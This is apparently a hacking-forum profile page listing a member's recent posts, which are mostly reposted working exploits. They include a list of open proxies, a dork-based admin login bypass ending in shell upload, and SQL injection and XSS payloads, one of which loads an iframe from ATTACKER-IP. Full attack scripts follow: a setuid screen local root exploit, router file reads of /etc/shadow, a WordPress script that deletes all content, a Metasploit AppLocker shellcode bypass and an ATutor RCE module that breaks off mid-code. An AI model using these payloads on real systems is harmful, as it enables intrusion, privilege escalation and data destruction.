Jump to content

geeko

Active Members
  • Content Count

    61
  • Joined

  • Last visited

Community Reputation

26 Excellent

About geeko

  • Rank
    Registered user
  • Birthday 03/05/1977

Converted

  • Location
    Paris
  • Interests
    C programming

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. 46.99.133.241:1080 66.58.244.108:24705 71.228.211.89:17002 45.63.90.226:6789 162.254.168.154:56499 68.7.156.247:13623 104.238.183.182:6789 67.197.149.140:18293 104.219.112.114:52862 208.104.74.191:27899 47.35.38.116:57216 108.218.207.108:30049 183.232.25.100:4080 107.151.129.249:1080 68.178.128.170:18749 45.63.82.190:6789 24.2.70.116:24182 180.92.239.217:1080 97.82.41.68:40641 45.63.88.229:6789 72.243.180.159:45554 24.196.134.76:18527 186.121.206.234:1080 67.197.28.10:43491 45.63.83.124:6789 64.126.70.72:53473 8.30.102.50:45554 76.8.208.230:45554 204.248.125.246:45554 104.207.150.81:6789 184.20.102.255:1080 66.167.193.138:22010 45.32.130.95:6789 47.208.147.42:27181 63.240.250.44:50652 67.170.49.111:29381 223.25.99.163:1180 47.222.33.206:55495 76.29.93.253:50999 73.25.253.84:25242 104.238.182.74:6789 64.121.199.87:20985 24.189.131.7:19821 208.74.33.114:10223 45.63.88.181:6789 173.208.137.46:6789 24.178.207.30:10379 75.118.153.228:10200 208.104.74.89:27677 45.32.130.120:6789 27.123.1.162:1080 216.10.224.223:45554 24.74.75.139:34070 96.237.161.130:46555 117.74.120.81:1080 74.75.164.255:10200 97.99.103.153:53293 75.151.213.85:3366 162.213.178.102:45554 68.64.229.84:45554 36.66.213.167:1080 45.63.88.187:6789 208.104.74.229:27809 47.35.79.9:46845 24.240.255.93:12666 45.32.139.243:6789 100.42.158.187:45554 75.76.230.236:45554 104.238.180.134:6789 208.104.232.210:52886 72.91.84.235:51815 209.159.251.12:56511 67.197.232.209:23864 104.238.183.133:6789 97.77.75.181:28111 73.181.120.114:59152 216.24.77.41:17382 45.32.213.237:6789 45.63.90.33:6789 45.63.89.78:6789 216.212.236.240:45554 54.215.184.209:34646 76.29.6.56:40178 73.199.232.15:30495 45.32.141.69:6789 91.195.103.172:31336 73.15.240.216:28416 76.94.99.191:63798 76.25.126.209:58399 45.63.84.133:6789 24.16.89.71:38784 45.32.130.189:6789 45.32.137.112:6789 68.117.143.146:17472 68.81.198.11:21645 45.32.128.60:6789 190.129.1.141:46690 175.143.94.161:10233 123.207.167.125:1080 67.197.251.54:20191 104.244.223.85:24950 24.72.213.167:45554 174.141.178.158:45554 63.142.208.138:14803 45.32.141.196:6789 24.93.138.78:10200 104.241.13.16:10200 208.104.74.50:27766 67.197.236.88:22961 45.55.28.39:21532 104.220.172.192:14811 70.99.133.238:15466 72.47.70.110:55446 104.244.140.93:45554 73.13.150.205:12327 208.111.120.173:10200 67.197.29.170:43075 68.225.192.228:21202 73.59.46.201:45554 103.195.142.88:9999 173.26.244.42:36839 67.197.253.126:18583 67.197.232.59:24018 64.4.99.16:62915 67.197.29.186:43091 180.178.104.178:1080 45.55.28.39:24609 66.110.216.105:39431 64.184.5.7:45554 68.198.171.167:29702 104.219.112.98:16329 24.249.92.200:45554 45.63.94.22:6789 45.63.85.71:6789 45.32.136.150:6789 70.234.238.97:8088 45.63.93.251:6789 96.27.214.206:45554 64.185.49.177:45554 115.133.125.17:55363 45.63.91.180:6789 47.88.77.171:1080 67.197.252.158:18807 67.50.240.12:26089 104.238.180.191:6789
  2. Dork: intext:"Powered by ENS Consultants" |=============================================================| | | | Exploit Title :ENS Consultants Bypass Login Vulnerability | | | Google Dork intext:"Powered by ENS Consultants" | Tested on : Paroot | |======================================| | | Tutorial : | | Search The Dork Or Go To Vendor HomePage And Select Your Target | Then Go To Admin Panel At : /admin/login.php | And Open Noredirect Add-Ons And Click On "Add" | Paste The Target With ^ Character : ^Target | At Last Change Url To : site/admin/index.php | Upload Your Shell And Enjoy ! | |=============================================================|
  3. # # # # # # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection # Google Dork: inurl:index.php?option=com_abstract # Date: 02.03.2017 # Vendor Homepage: http://joomla6teen.com/ # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/ # Demo: http://demo.joomla6teen.com/abstractmanager # Version: 2.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid= # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL] # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 # # # # #
  4. passfile-ul care tu il cauti defapt e un wordlist ....sau password list .... ti l poti face singur fara stres depinzand de tarile care vrei sa le scanezi sau daca vrei sa dai random poti folosi ceva general care le poti gasi la un singur search pe google
  5. [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt [+] ISR: ApparitionSec Vendor: ========== sourceforge.net/projects/phpshell/ phpshell.sourceforge.net/ Product: ============= PHPShell v2.4 Vulnerability Type: ==================== Cross Site Scripting CVE Reference: ============== N/A Security Issue: ================ Multiple cross site scripting entry points exist in PHPShell undermining the integrity between users browser and server. Allowing remote attackers to bypass access controls such as the same-origin policy. If an authenticated user clicks an attacker supplied link. XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL, PHPShell simply reads our XSS payload in the URL and echoes it back to client. <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post"> Since PHPShell purpose is to execute system commands this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell. Reference: " http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt " Tested successfully in Firefox Exploit/POC: ============= XSS 1) http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E OR Inject IFRAME to phish and steal credentials, you get the idea. http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!-- XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php On the Login Authentication HTML form 'username' input field " onMousemove="alert(document.cookie) enter a password and hit Enter. Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: =============================== Vendor Notification: No reply In addition the INSTALL file "Bugs? Comments?" Tracker System link is HTTP 404 http://sourceforge.net/tracker/?group_id=156638 February 18, 2017 : Public Disclosure
  6. Cisco ASA: Buffer overflows in WebVPN cifs handling CVE-2017-3807 The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: <a href="https://portal/+webvpn+/CIFS_R/share_server/share_name/file" title="" class="" rel="nofollow">https://portal/+webvpn+/CIFS_R/share_server/share_name/file</a>. When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct: http_cifs_context: +0x160 char* file_dir +0x168 char* file_name These strings are copied in various places, but is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode: filename_copy_buf = calloc(1LL, 336LL); net_handle[10] = filename_copy_buf; if ( filename_copy_buf ) { src_len = _wrap_strlen(filename_from_request); if ( filename_from_request[src_len - 1] == ('|') ) { // wrong length (src length) strncpy((char *)filename_copy_buf, filename_from_request, src_len - 1); } In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow. There appear to be various other places where the copying is done in an unsafe way: http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer. http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy. Possibly http_add_query_str_from_context. There are probably others that I missed. Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist. Repro: Login to WebVPN portal, navigate to: <a href="https://portal/+webvpn+/CIFS_R/server/name/" title="" class="" rel="nofollow">https://portal/+webvpn+/CIFS_R/server/name/</a> followed by 500 'A's. ("server" and "name" may be passed verbatim) *** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 *** ======= Backtrace: ========= /lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f] /lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee] /lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99] /lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0] lina(+0x321976a)[0x7fa41a2b276a] lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83] lina(resMgrCalloc+0x100)[0x7fa419659410] lina(calloc+0x94)[0x7fa419589a34] lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608] lina(ewsServeFindDocument+0x142)[0x7fa418278192] lina(ewsServeStart+0x114)[0x7fa4182784a4] lina(ewsParse+0x19a0)[0x7fa418272cc0] lina(ewsRun+0x9c)[0x7fa41826955c] lina(emweb_th+0x6ab)[0x7fa418286aeb] lina(+0xde58ab)[0x7fa417e7e8ab] This was tested on 9.6(2) This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
  7. [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt [+] ISR: ApparitionSec Vendor: =============== www.sawmill.net Product: ======================== Sawmill Enterprise v8.7.9 sawmill8.7.9.4_x86_windows.exe hash: b7ec7bc98c42c4908dfc50450b4521d0 Sawmill is a powerful heirarchical log analysis tool that runs on every major platform. Vulnerability Type: =================================== Pass the Hash Authentication Bypass CVE Reference: ============== CVE-2017-5496 Security Issue: ===================== Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking account password hashes. This issue usually is known to affect Windows systems e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also present itself in a vulnerable Web application. Sawmill account password hashes are stored under LogAnalysisInfo/ directory in "users.cfg". e.g. users = { root_admin = { username = "admin" password_checksum = "e99a18c428cb38d5f260853678922e03" email_address = "" This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is stored in some other location that is then compromised, it can lead to subversion of Sawmills authenticaton process. Moreover, since 'users.cfg' file is world readble a regular non Admin Windows user who logs into the system running sawmill can now grab a password hash and easily login to the vulnerable application without the needing the password itself. How to test? Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non Administrator user. 1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash. 2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin. Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no salt. e.g. password: abc123 MD5 hash: e99a18c428cb38d5f260853678922e03 Disclosure Timeline: ===================================== Vendor Notification: January 7, 2017 CVE-2017-5496 assigned : January 20 Request status : January 26 Vendor: Fix avail later in year still no ETA Inform vendor public disclose date February 18, 2017 : Public Disclosure Network Access: =============== Remote Impact: ====================== Information Disclosure Privilege Escalation Severity Level: ================ High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  8. ############################################################# # Application Name : SQLi in Dejabú's Scripts # Vulnerable Type : SQL İnjection # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id= # Author: fl3xpl0it a.k.a KurokoTetsuya # Date: 20.02.2017 # Tested On Demo Sites: [+] http://www.cepaproduccion.com/content/news.php?id=1114' [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2 # Warning: If you not found SQLi , you try SQLi other parameter. # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi) # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected) #############################################################
  9. # Exploit Title: Polycom VVX Web Interface - Change Admin Password as User # Date: January 26, 2017 # Exploit Author: Mike Brown # Vendor Homepage: http://www.polycom.com/ # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436 # CVE : N/A # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface. # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses # and account information. 1. Login with the "User" Account. 2. Navigate to Settings > Change Password. 3. Fill in "Old Password" with the current "User" password. 4. Fill in "New Password" with the new "Admin" account password, and confirm. 5. Using a live HTML editor, inspect the old password field. you will see: <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword" default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password"> 6. Change the name field to "120" 7. Click "Save" 8. An error will be shown on screen but you can now log into the Admin account with the new password.
  10. #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
  11. # Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read # Date: 27/01/2017 # Exploit Author: Saeid Atabaki # Version: RG4332_V2.7.0 # Tested on: RG4332 with mini_http 1.19 = 1 ============================================================= GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT Connection: close --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=17746062; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh = 2 ============================================================= GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT Connection: close --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=17746062; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  12. * Exploit Title: Bulk Delete [Privilege Escalation] * Discovery Date: 2016-02-10 * Exploit Author: Panagiotis Vagenas * Author Link: https://twitter.com/panVagenas * Vendor Homepage: http://bulkwp.com/ * Software Link: https://wordpress.org/plugins/bulk-delete/ * Version: 5.5.3 * Tested on: WordPress 4.4.2 * Category: WebApps, WordPress Description ----------- _Bulk Delete_ plugin for WordPress suffers from a privilege escalation vulnerability. Any registered user can exploit the lack of capabilities checks to perform all administrative tasks provided by the _Bulk Delete_ plugin. Some of these actions, but not all, are: - `bd_delete_pages_by_status`: deletes all pages by status - `bd_delete_posts_by_post_type`: deletes all posts by type - `bd_delete_users_by_meta`: delete all users with a specific pair of meta name, meta value Nearly all actions registered by this plugin can be performed from any user, as long as they passed to a query var named `bd_action` and the user has a valid account. These actions would normally require administrative wrights, so we can consider this as a privilege escalation vulnerability. PoC --- The following script will delete all pages, posts and users from the infected website. ``` #!/usr/bin/python3 ######################################################################## ######## # Bulk Delete Privilege Escalation Exploit # # **IMPORTANT** Don't use this in a production site, if vulnerable it wi ll # delete nearly all your sites content # # Author: Panagiotis Vagenas <pan.vagenas@gmail.com> ######################################################################## ######## import requests loginUrl = 'http://example.com/wp-login.php' adminUrl = 'http://example.com/wp-admin/index.php' loginPostData = { 'log': 'username', 'pwd': 'password', 'rememberme': 'forever', 'wp-submit': 'Log+In' } l = requests.post(loginUrl, data=loginPostData) if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0: print("Couldn't acquire a valid session") exit(1) loggedInCookies = l.history[0].cookies def do_action(action, data): try: requests.post( adminUrl + '?bd_action=' + action, data=data, cookies=loggedInCookies, timeout=30 ) except TimeoutError: print('Action ' + action + ' timed out') else: print('Action ' + action + ' performed') print('Deleting all pages') do_action( 'delete_pages_by_status', { 'smbd_pages_force_delete': 'true', 'smbd_published_pages': 'published_pages', 'smbd_draft_pages': 'draft_pages', 'smbd_pending_pages': 'pending_pages', 'smbd_future_pages': 'future_pages', 'smbd_private_pages': 'private_pages', } ) print('Deleting all posts from all default post types') do_action('delete_posts_by_post_type', {'smbd_types[]': [ 'post', 'page', 'attachment', 'revision', 'nav_menu_item' ]}) print('Deleting all users') do_action( 'delete_users_by_meta', { 'smbd_u_meta_key': 'nickname', 'smbd_u_meta_compare': 'LIKE', 'smbd_u_meta_value': '', } ) exit(0) ``` Solution -------- Upgrade to v5.5.4 Timeline -------- 1. **2016-02-10**: Requested CVE ID 2. **2016-02-10**: Vendor notified through wordpress.org support forums 3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com 4. **2016-02-10**: Vendor responded and received details about the issue 5. **2016-02-10**: Vendor verified vulnerability 6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue exploit source : packetstormsecurity.com
  13. pune bre si sursa la copy-paste-uri ca asa e frumos si de obraz

    1. geeko

      geeko

      gata, multumit ?

  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Post::File def initialize(info={}) super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ This module will generate a .NET service executable on the target and utilise InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be added easily. }, 'License' => MSF_LICENSE, 'Author' => [ 'Casey Smith', # Original AppLocker bypass research 'OJ Reeves' # MSF module ], 'Platform' => [ 'win' ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> 'Aug 3 2015', 'References' => [ ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] ] )) register_options([ OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', 'INSTALLUTIL', %w(INSTALLUTIL)])]) end # Run Method for when run command is issued def exploit if datastore['TECHNIQUE'] == 'INSTALLUTIL' if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') end end # sysinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? if datastore['TECHNIQUE'] == 'INSTALLUTIL' execute_installutil end end def execute_installutil envs = get_envs('TEMP', 'windir') dotnet_path = get_dotnet_path(envs['windir']) print_status("Using .NET path #{dotnet_path}") cs_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.cs" exe_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.exe" installutil_path = "#{dotnet_path}InstallUtil.exe" print_status("Writing payload to #{cs_path}") write_file(cs_path, generate_csharp_source) register_files_for_cleanup(cs_path) print_status("Compiling payload to #{exe_path}") csc_path = "#{dotnet_path}csc.exe" csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") print_status("Executing payload ...") vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) register_files_for_cleanup(exe_path) end def get_dotnet_path(windir) base_path = "#{windir}Microsoft.NETFramework#{payload.arch.first == 'x86' ? '' : '64'}" paths = dir(base_path).select {|p| p[0] == 'v'} dotnet_path = nil paths.reverse.each do |p| path = "#{base_path}#{p}" if directory?(path) && file?("#{path}InstallUtil.exe") dotnet_path = path break end end unless dotnet_path fail_with(Failure::NotVulnerable, '.NET is not present on the target.') end dotnet_path end def generate_csharp_source sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') cs = %Q^ using System; namespace Pop { public class Program { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] public class Pop : System.Configuration.Install.Installer { private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; private static UInt32 INFINITE = 0xFFFFFFFF; [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); public override void Uninstall(System.Collections.IDictionary s) { byte[] sc = new byte[] {#{sc}}; IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); IntPtr id = IntPtr.Zero; WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); } } } ^ cs end end exploit source : packetstormsecurity.com
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authenication and reach the administrators interface where they can upload malcious code. You are required to login to the target to reach the SQL Injection, however this can be done as a student account and remote registration is enabled by default. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code ], 'References' => [ [ 'CVE', '2016-2555' ], [ 'URL', 'http://www.atutor.ca/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Mar 1 2016', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), OptString.new('USERNAME', [true, 'The username to authenticate as']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ],self.class) end def print_status(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def check # the only way to test if the target is vuln begin test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) rescue Msf::Exploit::Failed => e vprint_error(e.message) return Exploit::CheckCode::Unknown end if test_injection(test_cookie) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def create_zip_file zip_file = Rex::Zip::Archive.new @header = Rex::Text.rand_text_alpha_upper(4) @payload_name = Rex::Text.rand_text_alpha_lower(4) @plugin_name = Rex::Text.rand_text_alpha_lower(3) path = "#{@plugin_name}/#{@payload_name}.php" register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}") zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") zip_file.pack end def exec_code send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" }) end def upload_shell(cookie) post_data = Rex::MIME::Message.new post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name="modulefile"; filename="#{@plugin_name}.zip"") post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name="install_upload"") data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie, 'agent' => 'Mozilla' }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla', }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), 'cookie' => cookie, 'agent' => 'Mozilla', }) return true end end # auth failed if we land here, bail fail_with(Failure::Unknown, "Unable to upload php code") return false end def get_hashed_password(token, password, bypass) if bypass return Rex::Text.sha1(password + token) else return Rex::Text.sha1(Rex::Text.sha1(password) + token) end end def login(username, password, bypass) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "login.php"), 'agent' => 'Mozilla', }) token = $1 if res.body =~ /) + "(.*)");/ cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/ if bypass password = get_hashed_password(token, password, true) else password = get_hashed_password(token, password, false) end res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "login.php"), 'vars_post' => { 'form_password_hidden' => password, 'form_login' => username, 'submit' => 'Login' }, 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/ # this is what happens when no state is maintained by the http client if res && res.code == 302 if res.redirection.to_s.include?('bounce.php?course=0') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ if res && res.code == 302 && res.redirection.to_s.include?('users/index.php') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ return cookie end else res.redirection.to_s.include?('admin/index.php') # if we made it here, we are admin return cookie end end # auth failed if we land here, bail fail_with(Failure::NoAccess, "Authentication failed with username #{username}") return nil end def perform_request(sqli, cookie) # the search requires a minimum of 3 chars sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" rand_key = Rex::Text.rand_text_alpha(1) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"), 'vars_post' => { "search_friends_#{rand_key}" => 